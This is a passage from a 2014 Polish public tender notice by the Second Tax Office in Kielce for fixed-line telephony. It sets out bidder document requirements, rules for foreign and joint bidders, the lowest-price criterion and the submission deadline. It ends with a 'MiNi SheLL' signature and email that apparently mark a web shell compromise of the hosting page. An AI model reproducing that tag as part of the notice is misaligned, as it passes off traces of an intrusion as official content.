d) wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług telefonii stacjonarnej dla podmiotów biznesowych w okresie ostatnich 3 lat przed upływem terminu składania ofert wraz z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że usługi te zostały wykonane lub są wykonywane należycie, wg wzoru stanowiącego załącznik nr 4 do SIWZ,
e) aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art.24 ust.1 pkt 2 ustawy PZP, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, (w stosunku do osób fizycznych dokumentem tym jest oświadczenie wymienione powyżej w pkt 6.1. lit. b),
f) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przez upływem terminu składania ofert;
g) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega  
z opłacaniem składek na ubezpieczenia zdrowotne i społeczne lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
h) oświadczenie zgodnie z art. 26 ust 2d    - załączniki Nr 5 do SIWZ.
6.2. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej 	Polskiej, zamiast dokumentów, o których mowa powyżej w pkt 6.1. lit. e - g  składa dokument /   	dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, 	potwierdzające, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne,       	albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty 	zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c)  nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
6.3. Dokumenty, o których mowa w pkt 6.2. pkt a i c powinny być wystawione nie wcześniej niż 6 	miesięcy przed upływem terminu składania ofert.
6.4. Dokument, o którym mowa w pkt 6.2 pkt b  powinien być wystawiony nie wcześniej niż  3 	   	miesiące przed upływem terminu składania ofert.
6.5. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce 	zamieszkania, nie wydaje się dokumentów, o których mowa powyżej w pkt 6.2. zastępuje się je 	dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem 	sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego 	odpowiednio do miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub 	miejsce zamieszkania.
6.6. W przypadku wspólnego ubiegania się o udzielenie zamówienia, do oferty należy dołączyć      	pełnomocnictwo do reprezentowania wykonawców w postępowaniu albo reprezentowania 	
        w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Oferta wspólna powinna 	zawierać dokumenty opisane powyżej w pkt 6.1. lit. b, d - h oraz 6.2. lit.  a dla każdego 	Wykonawcy z osobna.
6.7. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych 	do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od 	charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji zgodnie z art.26 ust.2b i 2c 	ustawy PZP, wykonawca jest zobowiązany udowodnić zamawiającemu, iż będzie dysponował 	zasobami niezbędnymi do realizacji niniejszego zamówienia, w szczególności przedstawiając w 
     tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych 	zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
6.8. Oferta winna być podpisana przez osobę upoważnioną do reprezentowania wykonawcy, zgodnie 	z wpisem w stosownym rejestrze (podpis z pieczątką lub podpis czytelny).
6.9. Dokumenty wymienione  w pkt 6.1. lit. a, b, d, h i pkt 6.2., muszą mieć formę oryginałów. 	Pozostałe wymagane dokumenty  mogą być złożone w formie kopii poświadczonych za zgodność 	z oryginałem przez   osoby uprawnione, o których mowa w pkt 6.8 (z dopiskiem - za zgodność 
        z oryginałem).
6.10. Dołączone do oferty  pełnomocnictwa uprawniające do reprezentowania wykonawcy / -ów 
         w postępowaniu oraz zobowiązanie podmiotu trzeciego, o którym mowa w pkt 6.7. SIWZ     	 powinny 	mieć formę oryginałów lub kopii poświadczonej notarialnie. 
6.11. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, 	 poświadczonym przez wykonawcę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.drugi-kielce.us.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Drugi Urząd Skarbowy w Kielcach 25-647 Kielce ul. Częstochowska 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.09.2014 godzina 10:00, miejsce: Drugi Urząd Skarbowy w Kielcach 25-647 Kielce ul. Częstochowska 20
pok 203 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com